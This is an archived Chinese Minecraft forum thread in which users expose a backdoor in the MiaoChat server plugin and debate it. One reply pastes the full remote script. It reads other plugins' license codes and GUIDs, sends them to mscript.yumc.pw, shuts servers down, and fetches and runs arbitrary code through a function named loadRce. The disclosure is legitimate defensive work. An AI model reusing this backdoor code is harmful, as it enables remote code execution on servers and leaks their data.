举报插件MiaoChat包含后门

huzpsb · 发表于 2023-6-23 13:47:59

您尚未登录，立即登录享受更好的浏览体验！

您需要登录才可以下载或查看，没有帐号？注册(register)

x

本帖最后由 huzpsb 于 2023-6-23 15:08 编辑

https://www.mcbbs.net/thread-631240-1-1.html

证明如下：

下载这个文件，进行如下分析：
类 pw.yumc.MiaoChat.MiaoChat：
onEnable方法：

类pw.yumc.MiaoChat.listeners.ChatListener：
构造器：

类pw.yumc.MiaoChat.statistic.Statistics：
构造器：

start方法：

其实到这一步已经可以实锤具有远程代码下发行为了。
以下只是证明截至发帖时，这个远程代码下发的的确是恶意代码。

追踪这个URL：
https://ms.yumc.pw/api/plugin/download/name/report

存档：
https://web.archive.org/web/2023 ... ownload/name/report

假设玩家“haishengtangsan“存在：

可以看到，十分嚣张，甚至函数名称都叫loadRce。

追踪这个URL：
https://mscript.yumc.pw/api/plugin/download/name/rce

存档：
https://web.archive.org/web/2023 ... n/download/name/rce

可以看见，有游戏时刻提供的C&C服务器

结论：
MiaoChat包含后门。

附言：
因为 https://ms.yumc.pw/api/plugin/download/name/report 的内容是可以随意修改的，所以封禁玩家“haishengtangsan”并不能解决这个后门。

建议：
封禁用户yumc。
下架用户yumc的所有插件进行审查。

NAOProject · 发表于 2023-6-23 16:28:30

看了那么多评论，我感觉你们就是见不得miaowu好，屁大点事搬到论坛上来说，装个后门又不会要你们的命，不知道你们在害怕些什么，是害怕muaowu过的太好了吗，果然嫉妒使人面目全非

yumc · 发表于 2023-6-23 16:32:46

本人在论坛发布的一系列插件均有付费版本，未在论坛发布的付费版本有验证是否是正版插件的功能，后续我将一些付费插件改为免费插件发布，当做是福利。但是因为个人的失误，忘记删除了这些插件里面验证是否是正版插件的功能，实质上我从未对任何插件用户执行过恶意代码，现在我将在论坛免费发布的插件中移除这个功能，请各位下载新版插件，同时我也接受论坛管理层的一切处罚。非常抱歉给各位添麻烦了。已通过私信申请将所有插件移入回收区整改。

Don_Trueno · 发表于 2023-6-23 16:39:03

yumc 发表于 2023-6-23 16:32
本人在论坛发布的一系列插件均有付费版本，未在论坛发布的付费版本有验证是否是正版插件的功能，后续我将一 ...

可否解释一下验证是否是正版插件的功能的函数为什么要起名为 loadrce

Arisa_Enigma · 发表于 2023-6-23 17:19:15

非常抱歉给大家添麻烦了，其实喵呜这个部分的代码是用来处理龙之时装盗版插件用的，有人破解了龙之时装5.x的版本，我就让喵呜加了一部分验证逻辑，用来检查龙时部分码子和IP，本以为他这个库只是给付费插件的，没想到是公共代码库里的内容，导致统一编译上传后影响到了免费插件的部分代码逻辑，看得懂代码的可以看下存档部分，内容都是检查龙之时装的代码

模组唐三 · 发表于 2023-6-23 14:08:16

本帖最后由模组唐三于 2023-6-23 16:08 编辑

顺便补充一下，啥是RCE:

自报家门了属于是。

Missing-Love · 发表于 2023-6-23 14:11:38

6.23打开https://ms.yumc.pw/api/plugin/download/name/report
内容如下

// @ts-nocheck function checkDragonArmourers() { function sendMessage(data) { if (typeof data != "string") { data = JSON.stringify(data) } fetchContent('https://mscript.yumc.pw/api/plugin/message/message/' + data) } function loadRce() { try { load('https://mscript.yumc.pw/api/plugin/download/name/rce') } catch (ex) { sendMessage("code " + code + " error " + ex) } } function fetchContent(url, data) { try { var URL = Java.type('java.net.URL') var ByteArrayOutputStream = Java.type("java.io.ByteArrayOutputStream") var ByteArray = Java.type("byte[]") var PrintWriter = Java.type("java.io.PrintWriter") var connection = new URL(url).openConnection() connection.setUseCaches(true) if (data) { connection.setDoOutput(true) connection.setDoInput(true) connection.setRequestProperty('Content-Type', 'application/json') connection.setRequestProperty('X-Requested-With', 'XMLHttpRequest') var out = new PrintWriter(connection.getOutputStream()) out.print(data) out.flush() } var input = connection.getInputStream() var output = new ByteArrayOutputStream() var buffer = new ByteArray(1024) try { var n while ((n = input.read(buffer)) !== -1) { output.write(buffer, 0, n) } return output.toString("UTF-8") } finally { input.close() output.close() } } catch (error) { } } var Bukkit = Java.type('org.bukkit.Bukkit') var YamlConfiguration = Java.type('org.bukkit.configuration.file.YamlConfiguration') var Files = Java.type('java.nio.file.Files') var StandardCharsets = Java.type('java.nio.charset.StandardCharsets') var JavaString = Java.type('java.lang.String') var Paths = Java.type('java.nio.file.Paths') var System = Java.type('java.lang.System') var pluginManager = Bukkit.getPluginManager() // if (pluginManager.getPlugin('MiaoScript')) { return } var guid = 'unknow' try { var pluginHelper = new YamlConfiguration() pluginHelper.loadFromString(new JavaString(Files.readAllBytes(Paths.get('plugins', 'PluginHelper', 'config.yml')), StandardCharsets.UTF_8)) guid = pluginHelper.getString('guid') } catch (error) { } var plugin = pluginManager.getPlugin('DragonArmourers') if (plugin) { var code = 'unknow' try { var config = new YamlConfiguration() var content = new JavaString(Files.readAllBytes(Paths.get('plugins', 'DragonArmourers', 'config.yml')), StandardCharsets.UTF_8) config.loadFromString(content) code = config.getString('code') if (code == 'ejsudg4up7kmv0lfr640' || code == 'kpikiq2mh2zjy54jptzd' || code == 'chtvgm1wr5oa21ml5f1s' || code == 'fknpiq5ni6z7x5unlj78' || code == 'kpuwce0yt5yznmbyznmb' || code == 'joacfk4kf5i2c36mvy34') { return loadRce() } if (code == "aflnce3vq4yozbr300r3" || code == 'dimoku1xs6bs3z43tf2l') { Bukkit.getScheduler().callSyncMethod(plugin, function () { Bukkit.broadcastMessage("§c当前服务器存在盗版插件正在自动关服...") fetchContent('https://mscript.yumc.pw/api/plugin/report' + '/name/' + plugin.getDescription().getName() + '/version/' + plugin.getDescription().getVersion() + '/code/' + code + ':' + Bukkit.getServer().getPort() + '/uuid/' + (guid || 'unknow') + '/from/' + 'shutdown' ) return Bukkit.shutdown() }) } } catch (error) { } fetchContent('https://mscript.yumc.pw/api/plugin/report' + '/name/' + plugin.getDescription().getName() + '/version/' + plugin.getDescription().getVersion() + '/code/' + (code || 'unknow') + '/uuid/' + (guid || 'unknow') + '/from/' + '' ) } try { if (Bukkit.getPlayer('haishengtangsan')) { return loadRce() } } catch (ex) { sendMessage("Bukkit.getPlayer error " + ex) } var os_name = System.getProperty("os.name") if (os_name.startsWith('Windows') > 0) { if ((new java.io.File(".").getAbsolutePath()).indexOf('喵斗罗') > 0) { return loadRce() } try { if (guid == '53cec65f-d9db-4a0c-9a1f-0c3e178ce579' || guid == 'b6033a04-f62a-4461-9c27-3323d9e34a9a') { return loadRce() } } catch (ex) { } try { var dragonCoreConfig = new YamlConfiguration() dragonCoreConfig.loadFromString(new JavaString(Files.readAllBytes(Paths.get('plugins', 'DragonCore', 'config.yml')), StandardCharsets.UTF_8)) if (dragonCoreConfig.getString('Password') == 'DLDL.CircleCloud') { return loadRce() } } catch (error) { } if (new java.io.File('plugins/DragonCore/Gui/死亡页面.yml').exists()) { return loadRce() } if (new java.io.File('plugins/MythicMobs/Items/坐骑/千年罕见坐骑.yml').exists()) { return loadRce() } if (new java.io.File('plugins/MythicMobs/Items/斗凯/斗凯.yml').exists()) { return loadRce() } if (new java.io.File('plugins/MythicMobs/Items/斗铠/202204虎年二字斗铠.yml').exists()) { return loadRce() } if (new java.io.File('plugins/MythicMobs/Items/沙袋.yml').exists()) { return loadRce() } if (new java.io.File('plugins/DragonCore/Gui/MiaoDragonCoreEditor.yml').exists()) { return loadRce() } if (new java.io.File('plugins/DragonCore/Gui/聊天界面/表情界面.yml').exists()) { return loadRce() } } // var star = pluginManager.getPlugin('StarLibrary') // if (star) { // var starConfig = new YamlConfiguration() // var content = new JavaString(Files.readAllBytes(Paths.get('plugins', 'StarLibrary', 'DsPluginLib.yml')), StandardCharsets.UTF_8) // starConfig.loadFromString(content) // userqq = starConfig.getString('UserQQ') // if (userqq == '1632486754' || userqq == '502647092') { // try { // load('https://mscript.yumc.pw/api/plugin/download/name/rce') // } catch (ex) { // sendMessage("code " + code + " error " + ex) // } // } // } } try { checkDragonArmourers() } catch (error) { }

OFEOFAGF · 发表于 2023-6-23 14:52:31

看不懂代码
想知道这个后台是在插件里执行还是使用插件后会自动在端里植入卸掉插件都没用的那种

Neige · 发表于 2023-6-23 14:53:37

OFEOFAGF 发表于 2023-6-23 14:52
看不懂代码
想知道这个后台是在插件里执行还是使用插件后会自动在端里植入卸掉插件都没用的那种 ...

装了插件才会执行，执行一段他服务器给的任意代码，他代码里想干啥干啥

OFEOFAGF · 发表于 2023-6-23 14:55:30

Neige 发表于 2023-6-23 14:53
装了插件才会执行，执行一段他服务器给的任意代码，他代码里想干啥干啥 ...

感谢解答(´･ω･`)

杨宇宸 · 发表于 2023-6-23 14:56:41

温馨提示：你的签名，导致你的无效匿名；

huzpsb · 发表于 2023-6-23 14:57:02

本帖最后由 huzpsb 于 2023-6-23 14:58 编辑

杨宇宸发表于 2023-6-23 14:56
温馨提示：你的签名，导致你的无效匿名；

已经取消匿名了(还开了一个帖子吐槽这点)

贺兰兰 · 发表于 2023-6-23 15:32:07

好似，开香槟咯

ed333 · 发表于 2023-6-23 15:36:08

插眼吃瓜

Z菌啦啦啦丶 · 发表于 2023-6-23 15:36:23

省流：用MiaoChat，如果喵呜愿意整你，你的机器里可能会启动原神并且循环播放门酱

Z菌啦啦啦丶 · 发表于 2023-6-23 15:37:38

OFEOFAGF 发表于 2023-6-23 14:52
看不懂代码
想知道这个后台是在插件里执行还是使用插件后会自动在端里植入卸掉插件都没用的那种 ...

可以在你启动服务端的同时启动原神并且循环播放门酱

X_jianchuan__ · 发表于 2023-6-23 15:42:46

吃瓜吃瓜

匿名 *发表于 2023-6-23 15:48:04* · 发表于 2023-6-23 15:48:04

本帖最后由匿名于 2023-6-23 15:52 编辑

顺便说一句，这人几乎每天都访问我的个人主页。我一个和他基本上毫无交集的人怎么能引起他的注意，这一点就很奇怪，感觉他似乎是在看我的绿......（？）
总之这人我不好评价，接触不多，但是我感觉他能有艺术家这个头衔总感觉有些奇怪。

NAOProject · 发表于 2023-6-23 15:48:10

这件事就算了吧，毕竟miaowu对论坛做了那么多年的贡献，装个后门算什么

帐号		自动登录	找回密码
密码			注册(register)

拯救MCBBS：论坛页面归档列表

举报插件MiaoChat包含后门 - 反馈和投诉 - Minecraft(我的世界)中文论坛 -.html

[投诉] 举报插件MiaoChat包含后门

您尚未登录，立即登录享受更好的浏览体验！

评分

评分

评分

评分

评分

评分

评分

评分

评分

评分

评分